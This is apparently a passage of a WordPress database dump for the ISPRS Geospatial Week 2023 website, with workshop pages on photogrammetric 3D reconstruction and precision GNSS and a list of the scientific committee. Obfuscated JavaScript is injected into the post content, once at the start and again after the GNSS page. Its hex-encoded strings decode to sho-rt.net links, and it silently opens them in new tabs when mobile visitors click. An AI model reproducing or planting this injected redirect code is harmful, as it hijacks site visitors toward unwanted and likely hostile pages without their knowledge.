_0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)','','publish','closed','closed','','photogrammetric-3d-reconstruction-for-geo-applications-photoga-2023','','','2023-02-05 14:41:58','2023-02-05 14:41:58','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=3449',0,'dt_portfolio','',0),
(3450,1,'2022-12-16 13:39:46','2022-12-16 13:39:46','','w25m1','','inherit','open','closed','','w25m1','','','2022-12-16 13:39:46','2022-12-16 13:39:46','',3449,'https://gsw2023.com/wp-content/uploads/2022/12/w25m1.jpg',0,'attachment','image/jpeg',0),
(3451,1,'2022-12-16 13:40:25','2022-12-16 13:40:25','','Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)','','inherit','closed','closed','','3449-revision-v1','','','2022-12-16 13:40:25','2022-12-16 13:40:25','',3449,'https://gsw2023.com/?p=3451',0,'revision','',0),
(3452,1,'2022-12-16 13:42:15','2022-12-16 13:42:15','[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3480\" img_size=\"600x600\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Precision GNSS: Technology Advances and Applications for Navigation and Mapping</span></strong></h5>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5 style=\"text-align: justify;\">The Global Navigation Satellite Systems (GNSS) have become an indispensable component for a wide range of applications. With rapid advances in GNSS system development which currently includes four operational systems and various regional augmentation systems, high accuracy is increasingly demanded by many emerging applications. For examples, within-lane autonomous vehicle control requires dm or better positioning accuracy while dm accuracy is also demanded for smartphone-based navigation and mapping. Although high accuracy has been widely demonstrated, the use of low-cost GNSS receivers in mass-market applications present various challenges in order to achieve high accuracy with stringent requirements on system availability and integrity. This workshop will seek contributions that are addressing the related challenges. They can be research progress on the development of new concept, models, algorithms and systems for precise GNSS positioning (PPP, PPP-RTK, LEO etc) and integrated navigation systems (GNSS, INS, Vision etc), as well as novel applications to navigation and mapping including application system design, implementation, prototype, product and testing results.</h5>\r\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"default_button\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"64\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h5 style=\"color: gray;\"><span style=\"font-size: 14pt;\"><strong><u>Themes of event:</u></strong></span></h5>\r\n<ul>\r\n 	<li>\r\n<h6>Mathematical models and algorithms for precision GNSS</h6>\r\n</li>\r\n 	<li>\r\n<h6>Precise GNSS positioning algorithms (PPP, RTK, PPP-RTK etc)</h6>\r\n</li>\r\n 	<li>\r\n<h6>GNSS integrity monitoring and quality control algorithms</h6>\r\n</li>\r\n 	<li>\r\n<h6>GNSS augmentation algorithms and systems</h6>\r\n</li>\r\n 	<li>\r\n<h6>LEO-based satellite navigation and augmentation systems</h6>\r\n</li>\r\n 	<li>\r\n<h6>Atmospheric augmentation corrections for precision GNSS</h6>\r\n</li>\r\n 	<li>\r\n<h6>Precision GNSS with smartphones</h6>\r\n</li>\r\n 	<li>\r\n<h6>Precision GNSS with low-cost receivers</h6>\r\n</li>\r\n 	<li>\r\n<h6>Multi-sensor integrated systems (GNSS, INS, Vision etc)</h6>\r\n</li>\r\n 	<li>\r\n<h6>Precise positioning technologies in GNSS challenged environments</h6>\r\n</li>\r\n 	<li>\r\n<h6>Alternative technologies in GNSS denied environments</h6>\r\n</li>\r\n 	<li>\r\n<h6>Advanced software and hardware precision GNSS receivers</h6>\r\n</li>\r\n 	<li>\r\n<h6>Trends of future precision GNSS technology, systems and services</h6>\r\n</li>\r\n 	<li>\r\n<h6>Applications to navigation and mapping</h6>\r\n</li>\r\n</ul>\r\n<h6></h6>\r\n&nbsp;\r\n<h5 style=\"color: gray;\"><span style=\"font-size: 12pt;\"><strong><u>Scientific Committee:</u></strong></span></h5>\r\n<ul>\r\n 	<li>\r\n<h6>Yang Gao, University of Calgary, Canada</h6>\r\n</li>\r\n 	<li>\r\n<h6>Xiaohong Zhang, Wuhan University, China</h6>\r\n</li>\r\n 	<li>\r\n<h6>Ahmed El-Mowafy, Curtin University, Australia</h6>\r\n</li>\r\n 	<li>\r\n<h6>OlaØvstedal, Norwegian University of Life Sciences, Norway</h6>\r\n</li>\r\n 	<li>\r\n<h6>Jacek Paziewski, University of Warmia and Mazury in Olsztyn, Poland</h6>\r\n</li>\r\n 	<li>\r\n<h6>Augusto Mazzoni, Sapienza University of Rome, Italy</h6>\r\n</li>\r\n 	<li>\r\n<h6>Washington Ochieng, Imperial College of London, UK</h6>\r\n</li>\r\n 	<li>\r\n<h6>Nobuaki Kubo, Tokyo University of Marine Science and Technology, Japan</h6>\r\n</li>\r\n 	<li>\r\n<h6>Jinling Wang, University of New South Wales, Australia</h6>\r\n</li>\r\n 	<li>\r\n<h6>Charles Toth, Ohio State University, USA</h6>\r\n</li>\r\n 	<li>\r\n<h6>Byungwoon Park, Sejong University, South Korea</h6>\r\n</li>\r\n 	<li>\r\n<h6>Maorong Ge, German Research Centre for Geosciences (GFZ), Germany</h6>\r\n</li>\r\n 	<li>\r\n<h6>Michael Fu, Google, USA</h6>\r\n</li>\r\n 	<li>\r\n<h6>Chris Rizos, University of New South Wales, Australia</h6>\r\n</li>\r\n 	<li>\r\n<h6>Sunil Bisnath, York University, Canada</h6>\r\n</li>\r\n 	<li>\r\n<h6>Galera Monico, São Paulo State University, Brazil</h6>\r\n</li>\r\n 	<li>\r\n<h6>Paul Groves, University College of London, UK</h6>\r\n</li>\r\n 	<li>\r\n<h6>George Liu, Hong Kong Polytechnic University, Hong Kong</h6>\r\n</li>\r\n 	<li>\r\n<h6>Guanwen Huang, Chang’An University, China</h6>\r\n</li>\r\n 	<li>\r\n<h6>Hongzhou Yang, University of Calgary, Canada</h6>\r\n</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3486\" img_size=\"600x600\"][vc_single_image image=\"3494\" img_size=\"600x600\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 